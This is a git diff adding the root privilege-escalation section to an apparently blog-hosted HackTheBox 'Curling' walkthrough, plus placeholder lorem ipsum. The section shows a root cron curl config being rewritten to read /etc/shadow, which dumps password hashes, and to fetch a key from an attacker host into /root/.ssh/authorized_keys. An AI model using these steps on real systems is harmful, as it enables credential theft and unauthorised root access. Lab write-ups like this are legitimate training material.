--- a/_posts/2018-12-22-Curling.md
+++ b/_posts/2018-12-22-Curling.md
@@ -6,6 +6,9 @@ tags: [HackTheBox, HTB, ]
 header:
     teaser: "/assets/images/htb/curling/curling.png"
 ---
+Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
+
+![curling_info.png](/assets/images/htb/access/curling_info.png)
 
 ## User
 To begin enumeration, the `masscan` tool was used to scan the target system for open ports. 
@@ -239,3 +242,111 @@ floris@curling:~$ cat user.txt
 ```
 
 ## Root
+The path to privilege escalation can be seen in the output of the `ps waux | grep root` command. This command shows the processes on the system that are running as the `root` user.
+
+From the output of the `ps waux | grep root` command, there is a process running as root that is issuing the `curl` command shown below:
+
+```
+/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
+```
+
+From the output of `curl --help | grep '\-K'`, it can be seen that the command is using the `/home/floris/admin-area/input` file as a configuration file.
+
+```
+floris@curling:~/admin-area$ curl --help | grep '\-K'
+ -K, --config <file> Read config from a file
+```
+
+The result of this `curl` command is then being written to the `/home/floris/admin-area/report` file as specified with the `-o` flag.
+
+While the `root` user is the owner of the `input` and `report` files, users in the `floris` group are able to read and write to the these files.
+
+```
+-rw-rw---- 1 root   floris   25 Dec 22 17:54 input
+-rw-rw---- 1 root   floris  14K Dec 22 17:54 report
+```
+
+Examining the `input` file reveals that the curl command is directed towards the `http://127.0.0.1` URL -- the address of `localhost`.
+
+```
+floris@curling:~/admin-area$ cat input 
+url = "http://127.0.0.1"
+```
+
+Changing the contents of the `input` file to the text shown below results in the contents of the `/etc/shadow` being written to the `report` file.
+
+```
+url = "file:///etc/shadow"
+```
+
+The `/etc/shadow` file contains hashed passwords for system users, including the password hash for the `root` user. After a few seconds, the contents of the `report` file will be overwritten with the contents of `/etc/shadow`. The output below is a truncated version of the target system's `/etc/shadow` file.
+
+```
+floris@curling:~/admin-area$ cat report
+root:$6$RIgrVboA$HDaB29xvtkw6U/Mzq4qOHH2KHB1kIR0ezFyjL75DszasVFwznrsWcc1Tu5E2K4FA7/Nv8oje0c.bljjnn6FMF1:17673:0:99999:7:::
+daemon:*:17647:0:99999:7:::
+...
+sshd:*:17647:0:99999:7:::
+floris:$6$yl7KKyGaOhVExlCb$ONJceChbI7srpLlJ/AhCLgESU7E4gXexPVgsJMjvQ0hP.6fwslfwWmD15cuaYs9./Jin4e/4LURPgEBav4iv//:17673:0:99999:7:::
+mysql:!:17673:0:99999:7:::
+```
+
+The password hash the `root` user can be copied to a file on the attacking system. Then, `hashcat` can be used to attempt to crack the password hash.
+
+```
+root@kali:~/workspace/hackthebox/Curling# cat root-hash.txt 
+$6$RIgrVboA$HDaB29xvtkw6U/Mzq4qOHH2KHB1kIR0ezFyjL75DszasVFwznrsWcc1Tu5E2K4FA7/Nv8oje0c.bljjnn6FMF1
+```
+
+Since the hash begins with `$6`, this suggests that the hash is a `sha512crypt`.
+
+```
+root@kali:~/workspace/hackthebox/Curling# hashcat -h | grep sha512crypt
+   1800 | sha512crypt $6$, SHA512 (Unix)                   | Operating Systems
+```
+
+The `hashcat` command that was used in attempt to crack the password hash is shown below. Note that the password was not cracked.
+
+```
+root@kali:~/workspace/hackthebox/Curling# hashcat -m 1800 root-hash.txt /usr/share/wordlists/rockyou.txt --force
+```
+
+As the password hash was not cracked by the `hashcat` command above, an alternative privelege escalation method was required.
+
+Looking further into the `curl` configuration file `-K` flag, it appears that additional arguments can be set from within the configuration file. From `man curl`, an example is given.
+
+```
+# --- Example file ---
+# this is a comment
+url = "example.com"
+output = "curlhere.html"
+user-agent = "superagent/1.0"
+
+# and fetch another URL too
+url = "example.com/docs/manpage.html"
+-O
+referer = "http://nowhereatall.example.com/"
+# --- End of example file ---
+```
+
+From this, it appears that the `output` variable can be set within a configuration file to specify where the output of the `curl` command should be written. 
+
+From here, the `input` file that acts as a configuration file for `curl` when run on the target system was changed as represented below.
+
+```
+url = "http://10.10.14.2/id_rsa.pub"
+output = "/root/.ssh/authorized_keys"
+```
+
+After serving the SSH public key `id_rsa.pub` on the attacking system using `python -m SimpleHTTPServer 80`, the target system writes the contents of the attacking system's public SSH key to the target system's `/root/.ssh/authorized_keys` directory which allows the attacking system to SSH to the target system as `root`.
+
+This process is shown below.
+
+![root_pwn.gif](/assets/images/htb/curling/root_pwn.gif)
+
+
+```
+root@curling:~# cat root.txt 
+82c198ab<redacted>
+```
+
